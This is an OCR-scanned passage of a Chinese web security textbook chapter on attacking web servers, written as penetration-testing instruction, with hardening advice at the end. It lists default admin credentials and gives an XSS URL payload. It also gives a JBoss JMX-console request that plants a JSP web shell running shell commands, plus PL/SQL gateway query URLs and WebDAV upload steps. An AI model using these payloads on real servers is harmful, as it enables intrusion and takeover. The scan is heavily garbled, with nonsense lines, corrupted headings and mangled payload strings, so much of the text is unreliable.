表 18-1 一 些 常 见 管理 接口 的 默认 证 书 


用 户 名 密码 


Apache Tomcat admin (无 ) 
tomcat tomcat 
root root 

Sun JavaServer admin admin 

Netscape Enterprise Server admin admin 

Compaq Insight Manager administrator administrator 
anonymous (I) 
user user 
operator operator 
user public 

Zeus admin (T) 


除 Web 服 务 器 上 的 管理 接口 外 ， 大 量 设备 《如 交换 机 、 打 印 机 与 无 
线 接 入 点 ) 还 使 用 禁止 修改 其 默认 证 书 的 web 接口 。 以 下 资源 列 出 了 大 
量 技 术 的 默认 证 书 : 


口 www.cirt.net/passwords 
口 www.phenoelit-us.org/dpl/dpl.html 


渗透 测试 步 又 


(1) 检查 应 用 程序 解析 过 程 中 得 到 的 结果 ， 确 定 应 用 程序 使 
用 的 、 可 能 包含 可 访问 的 管理 接口 的 Web 服 务 器 与 其 他 技术 。 

(2) 对 Web 服 务 器 进行 端口 扫描 ， 确 定 在 指 问 主 目标 应 用 程 
序 的 不 同 端口 上 运行 的 所 有 管理 接口 。 

GB) 对 于 确定 的 接口 ， 查 阅 制 造 商 文档 资料 与 常用 密码 表 ， 
获得 默认 证 书 。 使 用 Metasploit 的 内 置 数据 库 扫描 服务 器 。 
a ee Ce 
证书 。 

(5) 如 果 能 够 访问 一 个 管理 接口 ， 审 查 可 用 的 功能 ， 确 定 是 
否 可 以 利用 这 项 功能 进一步 攻破 主机 与 主 应 用 程序 。 











18.1.2 默认 内 容 


大 多 数 Web 服 务 器 中 含有 可 用 于 攻击 服务 器 自身 或 主 目标 应 用 程序 
的 默认 内 容 与 功能 。 以 下 是 一 些 可 能 有 用 的 默认 内 容 。 

口 为 管理 员 设 计 的 调试 与 测试 功能 。 

口 用 于 演示 某 些 常 见 任务 的 样本 功能 。 

口 本 应 禁止 公众 访问 ， 但 无 意中人 允许 公众 访问 的 强大 功能 。 

口 包含 仅 在 安装 时 有 用 的 信息 的 web 服务器 手册 。 

1. 调试 功能 

通常 ， 为 方便 管理 员 进 行 诊断 而 设计 的 功能 对 攻击 者 极其 有 用 ， 因 
i i tae 
、 EL IA D o 

图 18-1 为 默认 页 面 phpinfo.php， 许 多 Apache 版 本 中 都 含有 该 页 面 。 
这 个 页 面 运行 PHP 函 数 phpinfo0 并 返回 其 结果 。 页 面 中 包含 大 量 与 PHP 
环境 、 配 置 设置 、Web 服 务 器 模块 和 文件 路 径 有 关 的 信息 。 




















System |Linm ubunts 2.6.27-7-sarver #1 SMP Fri Oct 24 07 37.55 UTC 2008 1036 
Buad Date | Oct 14 2008 12.43.47 
[Server API | Apache 20 Handler 














图 18-1 默认 页 面 phpinfo.php 











2. 样本 功能 

许多 服务 器 默认 包含 各 种 样本 脚本 与 页 面 ， 其 目的 在 于 演示 某 些 
Web 服 务 器 功能 与 API 的 用 法 。 通 常 ， 这 些 样 本 功能 并 无 害处 ， 也 不 会 
给 攻击 者 提供 攻击 的 机 会 。 但 实际 上 ， 基 于 以 下 两 点 原因 ， 事 实 并 非 如 








Wire 

D FSRR Ea Badal, Hy ee Boca HA BUT AS Ee AS Air 
望 执 行 的 操作 。 

口 许 多 样本 脚本 甚至 执行 可 被 攻击 者 直接 利用 的 功能 。 

第 一 个 问题 的 示例 为 Jetty 版 本 7.0.0 中 包含 的 Dump Servlet。 此 
Servlet 可 以 通过 /test/jjsp/dump.jsp 之 类 的 URL 访 问 。 一 旦 被 访问 ， 它 会 打 
印 Jetty 安 装 及 当前 请 求 的 各 种 详情 ， 包 括 请 求 查 询 字 符 串 。 因 此 ， 攻 击 
者 只 需 在 URL 中 包含 脚本 标签 ， 如 /tesUjsp/dump.jsp? 
%3Cscript%3Ealert(%22xss%22)%3C/script%3E， 即 可 实施 跨 站 点 脚本 攻 
i. 


Apache Tomcat 中 的 Sessions Example 脚 本 是 第 二 个 问题 的 典型 示 
例 。 如 图 18-2 所 示 ， 这 个 脚本 可 用 于 获取 并 设置 任意 会 话 变量 。 如 果 在 
服务 器 上 运行 的 应 用 程序 将 敏感 数据 保存 在 用 户 会 话 中 ， 攻 击 者 就 可 以 


查看 这 些 数据 ， 将 通过 修改 它 的 值 来 破坏 应 用 程序 的 处 理 过 程 。 





cop ica da) 

3 © p/wehh-app/serdders- examples/seret/SessionExample D- 8-*x 
< 
Sessions Example D 2 | 
Session ID: 062CB1131F90PS1641 DBBIDOSOEF 1B5 | 


Created Thu Jul 14 16:15:46 GMT 2011 
Last Accessed Thu Jul 14 16:15:46 GMT 2011 





The folowing data is in your session: 
Name of Session Attribute 


Value of Session Attribute: 
Subriel Query 





GET based form 


Name of Session Attribute: 
Value of Session Attribute: 


Submd Query 


URL encoded 








410% ~ 


18-2 Apache Tomcat 中 的 默认 SessionsExample 脚 本 


3. 强大 的 功能 

许多 Web 服 务 器 软件 包含 一 些 公众 无 法 访问 的 强大 功能 ， 但 终端 用 
户 通过 某 种 方式 可 以 访问 这 些 功能 。 许 多 时 候 ， 只 要 提供 正确 的 管理 证 
书 ， 应 用 程序 服务 器 都 允许 通过 应 用 程序 本 身 使 用 的 同一 HITP 端 口 来 
部 署 Web 档 案 WAR 文件) 。 应 用 程序 的 这 种 部 署 过 程 是 黑客 的 主要 
攻击 目标 。 常 见 的 渗透 测试 框架 能 够 自动 完成 以 下 过 程 : 扫描 默认 证 
书 、 上 传 包含 后 门 的 Web 档 案 ， 然 后 执行 该 档案 以 获取 远程 系统 上 的 命 
令 外 壳 ， 如 图 18-3 所 示 。 





wy Metasploit [ecos 


File Edit View Help 























图 18-3 ”使 用 Metasploit 攻 破 重 要 的 Tomcat 服 务 器 


4. JMX 

JBoss 默认 安装 的 JMX 控 制 台 是 一 种 典型 的 强大 默认 内 容 。JMX 探 
制 台 被 描述 为 “JBoss 应 用 程序 服务 喜 微 内 核 的 原始 视图 ”。 实 际 上 ， 通 
过 它 可 以 直接 访问 JBoss 应 用 程序 服务 器 中 的 任何 托管 Bean。 由 于 可 用 
功能 的 数量 众多 ， 因 此 ， 人 们 从 中 发 现 了 大 量 安全 漏洞 。 其 中 ， 最 简单 
的 利用 方法 ， 是 使 用 DeploymentFileRepository 中 的 store 方 法 创建 包含 后 
门 的 WAR 文 件 ， 如 图 18-4 所 示 。 
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图 18-4 JMX 控 制 台 包含 可 用 于 部 署 任意 WAR 文 件 的 功能 


例如 ， 以 下 URL 将 上 传 一 个 包含 后 门 的 cmdshell.jsp 页 面 : 


http: //wahh-app. com: 8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name- 
jboss. admint3Aservicet3DDeploymentFileRepository&methodName= 
storeéargType=java. lang. Stringé&arg0=cmdshell .warkargType= 

java. lang. Stringéargi-cmdshella&argType-java.lang.Stringkarg2- 
.jspkarglype=java. lang. String&arg3=t$3C%2Z5kuntime. getRuntime$28%29. exec 
S2Grequest.getParametert23t22ct22F29S29$3BS25b3 Lb0AkargTyvces= 

boo lean&arg4=True 


如 图 18-5 所 示 ， 该 URL 将 成 功 创建 可 执行 以 下 代码 的 服务 器 端 后 门 : 


<tRuntime.getKuntime().exec{request.getParameter("c"});%> 


图 18-5 ”使 用 JMX 控 制 台 在 J 了 goss 服 务 器 上 部 署 后 门 WAR 文 件 的 成 功 攻击 








<$Runtime.cetRuntime().exec(request.getParameter ("C" ) ) ;各 > 


然后 ， 内 置 的 部 区 扫描 匣 会 目 动 将 木马 WAR 文 件 部 普 到 JBoss 应 用 
程序 服务 器 中 。 部 蜀 该 文件 后 ， 即 可 以 在 新 建 的 cmdshell 应 用 程序 中 访 
问 这 个 文件 ， 在 本 示例 中 ， 其 中 仪 包含 cmdshell.jsp: 


http: //wahh-app. com: 8080/cmdshell/cmdshell. jsp?c=cmd%20 / 
c$20ipconftigs3Ec: \fco 





= 

wg 

=> 注解 ”要 解决 上 述 问题 ， 需 要 将 GET 和 POST 方法 仅 限 于 管 
理 员 使 用 。 但 是 ， 只 需 使 用 HEAD 方 法 提出 上 述 请 求 ， 即 可 轻松 突 
破 这 种 限制 有关 详细 信息 ， 请 访问 
www.securityfocus.com/bid/39710/) 。 和 任何 基于 配置 的 漏洞 一 
样 ，Metasploit 等 工具 能 够 相当 高 效 地 利用 各 种 此 类 JMX 漏 洞 。 


5. Oracle 应 用 程序 

强大 的 默认 功能 的 最 典型 示例 ， 要 属 Oracle 应 用 程序 服务 器 实施 的 
PL/SQL 网 关 ; 其 他 Oracle 产 品 ， 如 电子 商务 套件 (E-Business Suite) 也 
采用 了 这 个 网 天 。 这 项 功能 提供 一 个 接口 ， 通 过 它 可 同一 个 后 端 Oracle 
数据 库 提出 Web 请 求 。 攻 击 者 可 以 使 用 类 似 于 下 面 的 URL 同 数据 库 过 程 
提交 任意 参数 : 


https: //wahh-app.com/pls/dad/package.procedure?paraml=fockparam2=bar 


这 项 功能 本 用 于 将 某 个 数据 库 执行 的 业务 逻辑 转换 成 用 户 友 好 的 
Web 应 用 程序 。 但 是 ， 由 于 攻击 者 能 够 指定 任意 过 程 ， 因 此 ， 他 可 以 利 
用 PL/SQL 网 关 访 问 数据 库 中 的 强大 功能 。 例 如 ， 
SYS.OWA_UTIL.CELLSPRINT 过 程 可 用 于 执行 任意 数据 库 查 询 ， 从 而 
获取 敏感 数据 : 


nttps://\ 











app.com/pls/dad/SYS.OwA_UTIL.CELLSPRINT?P_THEQUERY=SELECT+ 


为 防止 这 种 攻击 ，Oracle 引 入 一 个 名 为 PL/SQL 排 除 列表 (Exclusion 
List) 的 过 滤器 。 该 过 滤器 检查 被 访问 的 包 的 名 称 ， 并 阻止 攻击 者 访问 
任何 以 下 面 的 表达 式 开 头 的 包 : 

SYS. 
DBMS _ 
UTL_ 
OWA _ 
OWA. 
HTP. 
HTF. 

该 过 滤器 则 在 阻止 攻击 者 访问 数据 库 中 功能 强大 的 默认 功能 。 但 
是 ， 上 面 的 列表 并 不 全 面 ， 无 法 阻止 攻击 者 访问 数据 库 管 理 员 拥有 的 其 
他 功能 强大 的 默认 过 程 ， 如 CTXSYS 与 MDSYS。 此 外 ， 本 章 后 面 还 会 





介绍 与 PL/SQL 排 除 列 表 有 关 的 一 些 问 题 。 
当然 ，PL/SQL 网 关 最 初 主要 用 于 传送 数据 包 和 过 程 ， 但 此 后 发 现 


它 的 许多 默认 功能 都 包含 漏洞 。2009 和 年， 电子 商务 套件 的 默认 数据 包 组 
成 部 分 被 证 实 包含 知 干 漏洞 ， 包 括 可 被 攻击 者 用 于 编辑 任意 页 面 。 研 究 
人 员 提 供 了 使 用 icx_define_pages.DispPageDialog 在 管理 员 的 登录 页 面 中 
注入 HTML， 以 实施 保存 型 跨 站 点 脚本 攻击 的 示例 : 

i ] id=[page_id] 


vls/dad/icx_define_pages.DispPageDialog?p_mode=RENAMEé&amp; p_vage_id 


渗透 测试 步 又 


(1) Nikto 之 类 的 工具 可 有 效 确 定 大 多 数 默 认 的 Web 内 容 。 第 4 
ae 应 用 程序 解析 过 程 应 已 确定 所 针对 的 服务 器 中 的 绝 大 多 数 
默认 内 容 。 

(2) 使 用 搜索 引擎 和 其 他 资源 确定 与 已 知 应 用 程序 使 用 的 技 
术 有 关 的 默认 内 容 与 功能 。 如 果 可 能 ， 可 在 本 地 计算 机 上 安装 这 些 
技术 ， 从 中 查找 任何 可 在 渗透 测试 中 利用 的 默认 功能 。 


18.1.3 KY! 


当 Web 应 用 程序 收 到 一 个 访问 目录 而 非 真实 文件 的 请 求 时 ， 它 会 以 
下 面 这 3 种 方式 进行 啊 应 。 

口 它 返回 目录 中 的 一 个 默认 资源 ， 如 index.html。 

口 它 返 回 一 个 错误 ， 如 HTTP 状 态 码 403， 表 示 请 求 被 禁止 。 

口 它 返回 一 个 列表 ， 显 示 目 录 的 内 容 ， 如 图 18-6 所 示 。 
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Index of /pub/images 


Name Last modified Size Description 


| 
x 





T -2010 0051 29K 
hart 3 jpg 18-hm-2010 0039 36K 
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3593 2011 0853 1.7M 
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94624342144187601 påf 16-Jun-2011 0649 11M 
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图 18-6 ”目录 列表 


许多 时 候 ， 目 录 列 表 (directory listing) 并 不 会 造成 安全 威胁 。 例 
如 ， 泄 露 一 个 图 像 目 录 的 索引 根本 不 会 引起 任何 不 展 后 果 。 确 实 ， 人 们 
常 党 有 意 泄 露 目录 列表 ， 因 为 它们 有 助 于 在 包含 静态 内 容 的 站 点 间 导 
航 ， 如 前 例 所 示 。 但 是 ， 基 于 以 下 两 个 主要 原因 ， 获 得 目录 列表 有 利于 
攻击 者 对 应 用 程序 实施 攻击 。 

口 许 多 应 用 程序 并 不 对 它们 的 功能 与 资源 实施 正确 的 访问 控制 ， 而 
a eer 于 访问 敏感 内 容 的 URL 〈 请 参阅 第 8 章 了 解 相关 

Be) 8 

口 日 志 、 备 份 文件 、 旧 版 脚本 等 文件 与 目录 经 常 被 无 意 遗 漏 在 服务 
器 的 Web 根 目录 中 。 

在 上 述 两 种 情况 下 ， 真 正 的 漏洞 位 于 其 他 地 方 ， 其 原因 在 于 没有 对 
敏感 数据 实施 正确 的 访问 控制 。 但 是 ， 由 于 这 些 漏洞 极其 普 裔 ， 不 安全 
的 资源 的 名 称 可 能 很 难 猜 测 ， 因 此 ， 这 时 获得 目录 列表 对 攻击 者 而 言 非 
常 重 要， 往往 可 以 让 他 们 迅速 攻破 整个 应 用 程序 。 






































渗透 测试 步 又 


回 在 应 用 程序 解析 过 程 中 发 现 的 Web 服 务 器 上 的 每 一 个 目录 提 
出 一 个 请 求 ， 确 定 任何 返回 目录 列表 的 场合 。 








E 








O 注解 ” 除 上 述 可 直接 获得 目录 列表 的 情况 外 ， 攻 击 者 还 可 
以 利用 大 量 已 经 在 Web 服 务 器 中 发 现 的 漏洞 获取 目录 列表 。 本 章 后 
面 将 讨论 其 中 一 些 漏洞 。 





18.1.4 WebDAV 方 法 


WebDAV 指 用 于 Web 分 布 式 创 作 与 版 本 控制 的 HTTP 方 法 集合 。 自 
1996 年 以 来 ， 这 些 方法 得 到 了 广泛 应 用 。 最 近 的 云 存储 和 协作 应 用 程序 
也 采用 了 WebDAV 方 法 ， 因 为 这 些 应 用 程序 需要 使 用 现 有 的 防火 墙 友好 
的 协议 〈 如 HTITP) 路 系统 访问 用 户 数据 。 如 第 3 章 所 述 ，HTTP 请 求 能 
够 使 用 除 标 准 GET 和 POST 以 外 的 各 种 方法 。WebDAV 添 加 了 大 量 其 他 
可 用 于 操纵 Web 服 务 器 上 的 文件 的 方法 。 鉴 于 其 提供 的 功能 的 特点 ， 如 
果 这 些 方法 可 以 由 低 权 限 用 户 访 问 ， 这 些 用 户 就 可 以 利用 它们 对 应 用 程 
序 实施 有 效 攻 击 。 以 下 是 一 些 值得 注意 的 方法 : 

口 PUT， 癌 指定 位 置 上 传 附加 文件 ; 

口 DELETE， 删 除 指定 的 资源 ; 

口 COPY， 将 指定 的 资源 复制 到 Destination 消 息 头 指定 的 位 置 ; 

口 MOVE， 将 指定 的 资源 移动 到 Destination 消 息 头 指定 的 位 置 ; 

口 SEARCH， 在 目录 路 径 中 搜索 资源 ; 

,日 PROPFIND， 获取 与 指定 资源 有 关 的 信息 ， 如 作者 、 大 小 与 内 容 
Eo 


可 以 使 用 OPTIONS 方 法 列 出 某 个 特定 目录 允许 的 HTTP 方 法 。 例 如 : 

















ETT is E 

nection ose 
Date: Sun ipr 11 56:27 GMT 
Server: Mi ft-1Is/6.0 
MicrosoitofiicewebServer: 5.9_: 
X-Powered-By: ASP.NET 
MS-Author-Via: MS-FP/4.0,DAV 


Content-Length: 0 


Public: OPTIONS, TRACE, GET, HEAD, DELETE, FUT, POST, COPY, MOVE, MKCOL, PROPFIN 
D, PROPPATCH, LOCK, UNLOCK, SEARCH 


这 个 响应 指出， 上 面 列 出 的 几 个 强大 的 方法 可 以 在 目录 中 使 用 。 然 


而 ， 实 际 上 ， 使 用 这 些 方 法 需要 通过 里 份 验 证 ， 或 取决 于 其 他 限制 。 

其 中 ，PUT 方 法 特别 危险 。 如 果 能 够 上 传 Web 根 目录 中 的 任意 文 
a 就 可 以 在 服务 器 上 创建 将 由 服务 器 出 模 块 执行 的 后 门 脚本 ， 从 而 完 
全 控制 应 用 程序 ， 甚 至 是 Web 服 务 嚣 本身 。 如 果 PUT 方 法 存在 且 被 激 
活 ， 束 可 以 通过 以 下 方式 证 实 这 一 点 : 

PUT /public/test.txt HTTP/1.1 

Host: mdsec.net 

Content-Length: 4 


test 


HTTP/1.1 201 Created 


注意 ， 应 用 程序 可 能 会 针对 每 个 目录 实施 不 同 的 权限 ， 因 此 ， 在 测 
试 过 程 中 需要 进行 递归 检查 。 这 时 ， 可 以 使 用 DAVTest (将 在 下 一 节 介 
绍 ) 之 类 的 工具 在 服务 器 的 所 有 目录 中 检查 PUT 方法 ， 并 确定 这 些 目录 
允许 使 用 哪些 文件 扩展 名 。 为 克服 使 用 PUT 上 传 后 门 脚本 的 限制 ， 该 工 
具 还 会 在 MOVE 方 法 后 使 用 PUT 方 法 ， 例 如 : 














C:\>perl davtest.pl -url http://mdsec.net/public -directory 1 -move -quiet 


MOVE asp FAIL 
MOVE „shtml FAIL 
MOVE .aspx PAIL 


davtest.pl Summary: 

Created: http://mdsec.net/public/i 

MOVE/PUT File: http: //mdsec.net/public/1/davtest_Umtl1hT8izy2.php 
MOVE/PUT File: http://mdsec.net/public/1/davtest_umtllhi8izy2,.html 
MOVE/ PUT File: http://mdsec.net/public/l1/davtest_Umtllhi8izy2.c¢i 
MOVE/PUT File: http://mdsec.net/public/i/davtest_Umtl1lhiSizy2.cfim 
MOVE/FUT File: http://mdsec.net/public/1/davtest_UmtllhI8izy2.jsp 
MOVE/PUT File: http://mdsec.net/public/1/davtest_UmtllhI8izy2.p1l 
MOVE/PUT File: http://mdsec.net/public/l/davtest_Umtllhi8izy2. txt 
MOVE/PUT File: http://mdsec.net/public/1/davtest_UmtllhI8izy2, jntml 
Executes: http://mdésec.net/public/i/davtest_Umtlihisizy2.html 
Executes: http://mdésec.net/public/i/davtest_UmtllhTBizy2.txt 


A IF 


http://mdsec.net/public/ 


V 提示 “允许 终端 用 户 上 传 文件 的 WebDAV 实 例 通常 禁止 上 
传 特定 于 服务 器 环境 的 服务 器 端 脚本 语言 扩展 。 更 常见 的 情况 是 ， 
用 户 可 以 上 传 HTML 或 JAR 文 件 ， 攻 击 者 可 以 利用 这 两 种 文件 实施 
针对 其 他 用 户 的 攻击 〈 请 参阅 第 12 章 和 第 13 章 了 解 相关 信息 ) 。 





渗透 测试 步 又 


要 测试 服务 器 如 何 处 理 不 同 的 HTTP 方 法 ， 需 要 使 用 某 种 工 
有 具 ， 如 Burp Repeater， 滩 透 测 试 员 可 以 使 用 该 工具 发 送 任意 请 求 ， 
并 完全 控制 消息 头 和 消息 主体 。 

(1) 使 用 OPTIONS 方 法 列 出 服务 器 使 用 的 HITP 方 法 。 注 
意 ， 不 同 目录 中 激活 的 方法 可 能 各 不 相同 。 

(2) 许多 时 候 ， 一 些 方法 被 告知 有 效 ， 但 实际 上 它们 并 不 能 
使 用 。 有 时 ， 即 使 OPTIONS 请 求 返 回 的 啊 应 中 没有 列 出 茶 个 方 
法 ， 但 该 方法 仍然 可 用 。 因 此 ， 应 手动 测试 每 一 个 方法 ， 确 认 其 是 
否 可 用 。 

(3) 如 果 发 现 一 些 WebDAV 方 法 被 激活 ， 应 使 用 激活 
WebDAV 的 客户 端 进行 深入 调查 ， 如 Microsoft FrontPage 或 Internet 
Explorer 中 的 “以 Web 文 件 夹 方式 打开 ”(Open as Web Folder) 选 
项 。 

(a) 尝试 使 用 PUT 方 法 上 传 一 个 良性 文件 ， 如 文本 文件 。 

(b>) 如 果 上 传 成 功 ， 尝 试 使 用 PUT 上 传 一 个 后 门 脚本 。 

Cc) 如 果 运 行 脚本 所 需 的 扩展 名 受到 阻止 ， 尝 试 以 .txt 扩 展 名 
oo 并 使 用 MOVE 方 法 将 其 移动 到 采用 新 扩展 名 的 文件 


Cd) 如 果 以 上 方法 均 无 效 ， 尝 试 上 传 一 个 JAR 文 件 ， 或 一 个 
浏览 器 会 将 其 内 容 显 示 为 HTML 的 文件 。 
Ce) 使 用 davtest.pl 之 类 的 工具 遇 历 所 有 目录 。 








18.1.5 Web 服务 器 作为 代理 服务 器 


Web 服 务 器 有 时 被 配置 为 转发 或 反 疝 HTTP 代 理 服 务 右 (请 参阅 第 3 
章 了 解 相关 内 容 ) 。 如 果 一 人 台 服 务 器 被 配置 为 转发 代理 服务 器 ， 那 么 根 
据 它 的 配置 ， 可 以 利用 该 服务 器 执行 以 下 各 种 攻击 。 

O 攻击 者 可 以 使 用 该 服务 器 攻击 因特网 上 的 第 三 方 系统 ， 对 攻击 目 
标 而 言 ， 亚 意 流量 似乎 是 来 和 目 易 受 攻击 的 代理 服务 器 。 








a 攻击 者 可 以 使 用 代理 服务 器 连接 组 织 内 部 网 络 中 的 任意 主机 ， 攻 
击 从 因特网 无 法 直接 访问 的 目标 。 

D 攻击 者 可 以 使 用 代理 服务 器 反 回 连接 代理 服务 器 主机 上 运行 的 其 
他 服务 ， 突 破 防火 墙 限 制 ， 并 利用 信任 关系 避 开 身份 验证 。 

可 以 使 用 两 种 主要 的 技巧 让 转发 代理 服务 器 进行 正 同 连接 (onward 
connection) 。 第 一 种 方法 是 ， 发 送 一 个 包含 完整 UREL 的 HTTP 请求， 该 
UREL 中 包括 一 个 主机 名 称 与 一 个 端口 号 〈 可 选 ) 。 例 如 : 


herapp.com:80/ HTTP/1.0 





TTP/1.1 200 OK 


如 果 配 置 服 务 器 将 请 求 转发 到 指定 的 主机 ， 那 么 它 将 返回 那 台 主机 
的 内 容 。 人 但是， 一定 记得 核实 返回 的 内 容 不 是 来 自 最 初 的 服务 器 。 大 多 
数 Web 服 务 器 接受 包含 完整 URL 的 请 求 ， 许 多 服务 器 则 完全 忽略 在 URL 
中 指定 的 主机 ， 从 它们 自己 的 Web 根 目录 中 返回 被 请 求 的 资源 。 

第 三 种 利用 代理 服务 器 的 方法 是 使 用 CONNECT 方 法 指定 到 目标 主 
机 与 端口 号 。 例 如 : 


CONNECT wahh-otherapp.com:443 HTTP/1.0 








HTTP/1.0 200 Connection established 


如 果 服 务 器 以 这 种 方式 做 出 响应 ， 就 表示 它 正 在 代理 该 连接 。 通 
常 ， 第 二 种 技巧 的 功能 更 强大 ， 因 为 现在 代理 服务 器 将 转发 传送 到 指定 
主机 以 及 由 该 主机 送出 的 所 有 流量 ， 人 允许 穿 透 连接 中 的 其 他 协议 ， 攻 击 
非 HTTP 服 务 。 然 而 ， 大 多 数 代 理 服务 器 对 通过 CONNECT 方 法 可 到 达 
的 端口 实施 严格 的 限制 ， 通 常 只 允许 连接 端口 443。 

利用 这 种 攻击 的 技巧 已 经 在 10.4.1 节 详细 介绍 过 了 。 








渗透 测试 步 又 


(1) 使 用 GET 与 CONNECT 请 求 ， 答 试用 Web 服 务 器 作为 代理 
服务 器 ， 连 接 因特网 上 的 其 他 服务 器 ， 并 获取 其 中 的 内 容 。 

(2) 尝试 使 用 前 面 描述 的 两 种 技巧 连接 主机 基础 架构 中 的 不 
同 IP 地 址 与 端口 。 

(3) 尝试 使 用 前 面 描述 的 两 种 技巧 ， 在 请 求 中 指定 127.0.0.1 
为 目标 主机 ， 连 接 Web 服 务 器 上 的 常用 端口 号 。 


18.1.6 ”虚拟 了 缺陷 


第 17 章 介绍 了 如 何 使 用 HTTP Host 消 息 头 指定 返回 内 容 的 Web 站 
点 ， 配 置 Web 服 务 器 为 几 个 Web 站 点 的 主机 。 在 Apache 中 ， 虚 拟 主机 通 
过 以 下 方式 配置 : 





<VirtualHost *> 
ServerName eis 
DocumentRoot /var/www2 
</VirtualHost> 
除 DocumentRoot 指 令 外 ， 还 可 以 使 用 虚拟 主机 容器 为 Web 站 点 指定 


其 他 配置 选项 。 这 时 ， 我 们 常 犯 的 一 个 错误 是 忽略 默认 主机 ， 导 致 任何 
安全 配置 仅 适 用 于 一 台 虚 拟 主机 ， 而 在 访问 默认 主机 时 却 可 轻易 避 开 。 


渗透 测试 步 又 


(1) 使 用 以 下 方式 同根 目录 提交 GET 请 求 : 
口 正确 的 Host 消 息 头 ; 
口 随意 Host 消 息 头 ; 
口 Host 消 息 头 中 的 服务 器 下地 址 ; 
口 无 Host 消 息 头 。 
(2) 对 这 些 请 求 的 响应 进行 比较 。 常 见 的 结果 是 ， 在 Host 消 
k 中 使 用 一 个 IP 地 址 可 获得 目录 列表 。 还 可 以 获得 各 种 默认 内 


(3) 如果 观 察 到 不 同 的 行为 ， 使 用 生成 不 同 结果 的 Host 消 息 
头 重 复 应 用 程序 解析 过 程 。 一 定 要 使 用 -vhost 选 项 进行 一 次 Nikto 扫 
摘 ， 确 定 在 最 初 的 应 用 程序 解析 过 程 中 忽略 的 任何 默认 内 容 。 

















18.1.7 = Web Hk 4 45 Ac 


从 本 质 上 讲 ， 保 障 Web 服 务 器 配置 的 安全 并 不 困难 ; E, RAK 
意 与 缺乏 安全 意识 是 造成 问题 的 主要 原因 。 最 重要 的 是 必须 充分 了 解 所 
使 用 的 软件 的 文档 资料 及 有 天 的 强化 指南 。 
就 需要 解决 的 常见 配置 问题 而 言 ， 确 保 包 括 以 下 所 有 领域 。 

口 如 有 可 能 ， 修 改 所 有 默认 证 书 ， 包 括 用 户 名 和 密码 。 删 除 任何 不 
必要 的 账户 。 

口 在 Web 根 目录 的 相关 路 径 上 应 用 访问 控制 列表 (Access Control 
List, ACL) ， 或 者 对 非 标准 端口 设置 防火 墙 ， 阻 止 公众 访问 管理 接 


O. 
口 删 除 所 有 实现 商业 目的 并 不 完全 需要 的 默认 内 容 与 功能 。 浏 览 
确定 任何 遗留 的 项 目 ， 使 用 Nikto 工 具 进 并行 重 复 检 


口 如 果 需 要 保留 任何 默认 功能 ， 尺 量 对 其 进行 强化 ， 禁 用 不 必要 的 
选项 与 行为 。 

口 在 所 有 Web 目 录 中 碍 找 目录 列表 。 如 有 可 能 ， 在 一 个 控制 整个 服 
务 絮 的 配置 中 禁用 目录 列表 。 还 可 以 确保 每 个 目录 包含 服务 器 默认 提供 











的 ipdex.html 文 件 。 

口 除 应 用 程序 常用 的 方法 外 〈 通 党 为 GET 与 POST 方法 ) ， 禁 用 其 
他 所 有 方法 。 

口 确保 没有 将 Web 服 务 器 配置 生 代 理 服务 器 。 如 果 确 实 需要 这 项 功 

， 应 尽量 强化 其 配置 ， 只 人 允许 它 连 接 可 合法 访问 的 特定 主机 与 端口 。 
AMIR DR, UIP GH NO, MDI 

请求。 

口 如 果 Web 服 务 器 支持 虚拟 主机 ， 确 保 在 默认 主机 上 实施 服务 器 采 
W 述 的 测试 ， 证 明确 实 实施 了 安全 强 


18.2 5° Were HIEI as EK 





Web 服 务 器 软件 的 形式 各 异 ， 包 括 仅 用 于 显示 静态 页 面 的 极其 简单 
的 轻 量 级 软件 ， 以 及 能 够 处 理 各 种 任务 、 提 供 除 业务 逻辑 本 号 以 外 的 所 
有 功能 的 高 度 复杂 的 应 用 程序 平台 。 右 后 者 而 言 ， 人 们 大 多 认为 这 类 框 
架 是 安全 的 。 以 前 ，Web 服 务 占 软件 被 一 系列 严重 的 安全 漏洞 所 困扰 ， 
使 得 攻击 者 能 够 执行 任意 代码 、 禄 取 文 件 和 提升 权限 。 这 些 年 来 ， 主 流 
Web 服 务 器 平台 已 变 得 日 渐 可 靠 。 许 多 情况 下 ， 核 心 功能 仍 保持 静态 ， 
甚至 经 过 精简 ， 因 为 供应 商 有 意 减 少 默认 的 受 攻击 面 。 但 是 ， 即 使 这 些 
漏洞 越 来 越 少 ， 其 背后 的 原理 仍然 适用 。 在 本 书 第 1 版 中 ， 我 们 提供 了 
一 些 最 有 可 能 包含 漏洞 的 服务 器 软件 示例 。 目 第 1 版 出 版 以 来 ， 人 们 在 
各 类 软件 (通常 为 并 行 技术 或 服务 器 产品 〉 中 均 发 现 了 新 的 漏洞。 除 一 
些小 型 个 人 Web 服 务 器 及 其 他 次 要 目标 外 ， 这 些 新 漏洞 大 多 存在 于 以 下 
软件 之 中 : 

口 IS 和 Apache 中 的 服务 器 端 扩 展 。 

口 从 头 开 发 的 新 型 Web 服 务 器 ， 这 类 服务 器 主要 用 于 支持 特定 的 应 
用 程序 ， 或 作为 开发 环境 的 一 部 分 提供 。 它 们 可 能 较 少 受到 现实 世界 中 
的 黑客 的 关注 ， 因 而 更 可 能 存在 上 述 问题 。 


18.2.1 Dv H Re Fe AE R aR 


多 年 以 来 ，Web 应 用 程序 框架 一 直 存 在 各 种 严重 的 缺陷 。 我 们 将 介 
绍 最 近 在 某 个 框架 中 发 现 的 一 个 常见 缺陷 ， 这 个 缺陷 导致 在 该 框架 上 运 
行 的 许多 应 用 程序 都 易于 受到 攻击 。 

.NET 填 充 提示 

.NET 中 的 “填充 提示 ”(padding oracle) 漏洞 是 近年 来 最 为 著名 的 漏 
洞 。.NET 对 CBC 分 组 密码 使 用 PKCS #5 填充 ， 其 操作 方式 如 下 。 

分 组 密码 基于 固定 的 分 组 大 小 进行 操作 ， 在 .NET 中 ， 这 样 的 分 组 通 
常 为 8 或 16 字 节 。.NET 采 用 PKCS #5 标准 为 每 一 个 明文 字符 串 添加 填充 
字 节 ， 以 确保 生成 的 明文 字符 串 长 度 可 以 被 分 组 大 小 整除 。 这 时 ，.NET 
不 是 使 用 任意 值 进行 填充 ， 选 择 用 于 填充 的 值 是 填充 字 节 的 数量 。 每 个 
字符 串 都 会 被 填充 ， 如 果 初 始 字 符 串 是 分 组 大 小 的 倍数 ， 将 填充 整个 分 
组 。 因 此 ， 如 果 分 组 大 小 为 8， 则 必须 使 用 1 个 0x01 字 节 、2 个 0x02 字 
节 ， 或 最 多 8 个 0x08 字 节 的 任意 组 合 进行 填充 。 人 然后， 将 第 一 条 消息 的 
